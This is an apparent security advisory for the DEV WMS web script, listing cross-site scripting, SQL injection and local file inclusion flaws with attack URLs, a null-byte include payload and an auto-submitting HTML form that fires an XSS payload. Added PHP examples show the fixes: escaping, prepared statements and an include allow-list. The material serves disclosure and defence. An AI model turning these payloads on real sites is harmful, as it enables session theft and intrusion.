----------------------------------------------------------------
Script : DEV WMS
Type : Multiple Vulnerabilities ( Local File Inclusion / Cross Site Scripting / SQL Injection )
Alert : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Script Download : http://dev-wms.sourceforge.net/
----------------------------------------------------------------
XSS Vulnerability 1 :
Variable Sent Method : GET
Vulnerable Variable : session
Address : http://Example.com/?session=">><>><script>alert(document.cookie)</script>
Solution : Escape the session variable with htmlspecialchars() (with ENT_QUOTES) wherever it is written back into the page ...
----------------------------------------------------------------
XSS Vulnerability 2 :
Variable Sent Method : POST
Vulnerable Variable : kluc
Address : http://Example.com/index.php?session=0&action=search
Change Example.com to the address of the script on a real site, save the page below as ircrash.html, open the file in a browser and the injected script runs in the application's search page.
<html>
<head></head>
<body onload="document.form.submit()">
<form action="http://Example.com/index.php?session=0&action=search" method="POST" name="form">
<input type="hidden" name="prip" value="true"/>
<input type="hidden" name="action" value="search"/>
<input type="hidden" name="kluc" value="&quot;'''<>>>><script>alert('xss')</script>"/>
</form>
</body>
</html>
Solution : Escape the kluc variable with htmlspecialchars() (with ENT_QUOTES, since the payload also carries single quotes) wherever it is written back into the page ...
----------------------------------------------------------------
SQL Injection :
Method Of Send : GET
Vulnerable Variable : article
Address : http://Example.com/index.php?session=0&action=read&click=open&article=[SQL CODE]
Solution : Do not splice the article variable into the query; cast it to an integer or bind it as a parameter of a prepared statement. Filtering "dangerous characters" alone is not reliable ...
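The fixes suggested for XSS 1, XSS 2 and the SQL injection above, as one added PHP example. This is not DEV WMS code: the table name, column names, the PDO connection and the helper names are assumptions made for the illustration. Run it with `php` from the command line; it escapes the two advisory payloads, then queries an in-memory SQLite table with the injection strings bound instead of concatenated.

```php
<?php
// Added example, not DEV WMS code: output escaping for the session and kluc
// parameters (XSS 1 and 2) and a parameterised lookup for the article
// parameter (SQL Injection). The table name, column names and the PDO
// connection are assumptions made for this illustration.
declare(strict_types=1);

// Escape a value before it is placed in HTML text or an attribute.
// ENT_QUOTES is required: the kluc payload carries single quotes, which
// htmlspecialchars() leaves alone under its default flags.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Look an article up by id; the user value is bound, never concatenated.
function readArticle(PDO $pdo, string $articleParam): ?array
{
    // Ids are decimal digits only; anything else never reaches the database.
    if ($articleParam === '' || !ctype_digit($articleParam)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, title FROM articles WHERE id = :id');
    $stmt->execute([':id' => (int) $articleParam]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function check(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException('check failed: ' . $what);
    }
}

// Self-check from the command line against an in-memory SQLite database
// (requires the pdo_sqlite extension).
if (PHP_SAPI === 'cli') {
    // Payloads taken from the advisory above.
    $sessionPayload = '">><>><script>alert(document.cookie)</script>';
    $klucPayload = "\"'''<>>>><script>alert('xss')</script>";
    foreach ([$sessionPayload, $klucPayload] as $p) {
        $e = esc($p);
        check(strpbrk($e, "<>\"'") === false, 'no raw HTML metacharacters in ' . $e);
    }
    echo '<input type="hidden" name="session" value="' . esc($sessionPayload) . '">', PHP_EOL;

    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO articles (id, title) VALUES (1, 'first'), (2, 'second')");

    check(readArticle($pdo, '1 OR 1=1') === null, 'tautology rejected');
    check(readArticle($pdo, "1' UNION SELECT 1,2--") === null, 'union rejected');
    check(readArticle($pdo, '3') === null, 'missing row gives null');
    $row = readArticle($pdo, '2');
    check($row !== null && $row['title'] === 'second', 'valid id still works');
    echo 'ok', PHP_EOL;
}
```

The escaping is done at output time rather than on the way in, so the stored value stays intact and every place that echoes it is covered. For the article id, the digit check is a convenience for early rejection; the bound parameter is what actually prevents the injection, and it would hold even for a text column where a digit check does not apply.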
----------------------------------------------------------------
Local File Inclusion :
Method Of Send : GET
Vulnerable Variable : step
Address : http://Example.com/admin/index.php?start=install&step=file.type%00
Solution : Check the step variable with an if against a fixed list of allowed step names before it is used in an include. The %00 null byte cuts the file name off at that point, so anything the script appends after the step name is dropped ...
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
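The allow-list check suggested for the step variable, as an added PHP example that is not DEV WMS code. The step names, the file paths and the handler function are assumptions. PHP 5.3.4 and later reject include paths that contain a null byte, but mapping the request value onto a fixed table means the outcome no longer depends on the PHP version or on which characters a filter happens to strip.

```php
<?php
// Added example, not DEV WMS code: resolving the install step through a
// fixed allow-list instead of building a file name from $_GET['step'].
// The step names and file paths are assumptions made for this illustration.
declare(strict_types=1);

const INSTALL_STEPS = [
    'welcome'  => 'steps/welcome.php',
    'database' => 'steps/database.php',
    'finish'   => 'steps/finish.php',
];

// Map a step name to the file that implements it, or null if it is not
// listed. The user value is only ever used as an array key, so a %00,
// "../" or an absolute path can never reach include().
function installStepFile(string $step): ?string
{
    return INSTALL_STEPS[$step] ?? null;
}

// Request handler: refuse unknown steps instead of trying to filter them.
function handleInstallStep(array $get): void
{
    $file = installStepFile((string) ($get['step'] ?? ''));
    if ($file === null) {
        http_response_code(400);
        exit('unknown install step');
    }
    require __DIR__ . '/' . $file;
}

// Self-check from the command line.
if (PHP_SAPI === 'cli') {
    $cases = [
        ['welcome', 'steps/welcome.php'],
        ["file.type\0", null],        // the advisory's payload, %00 decoded
        ['welcome.php', null],        // must match exactly, not just start with a name
        ['../../etc/passwd', null],
        ['', null],
    ];
    foreach ($cases as [$step, $expected]) {
        if (installStepFile($step) !== $expected) {
            throw new RuntimeException('unexpected result for step ' . bin2hex($step));
        }
    }
    echo 'ok', PHP_EOL;
}
```

Run it with `php` to see the checks pass. The same pattern applies to any other include whose file name is derived from a request parameter: keep the allowed names in code and treat everything else as a bad request.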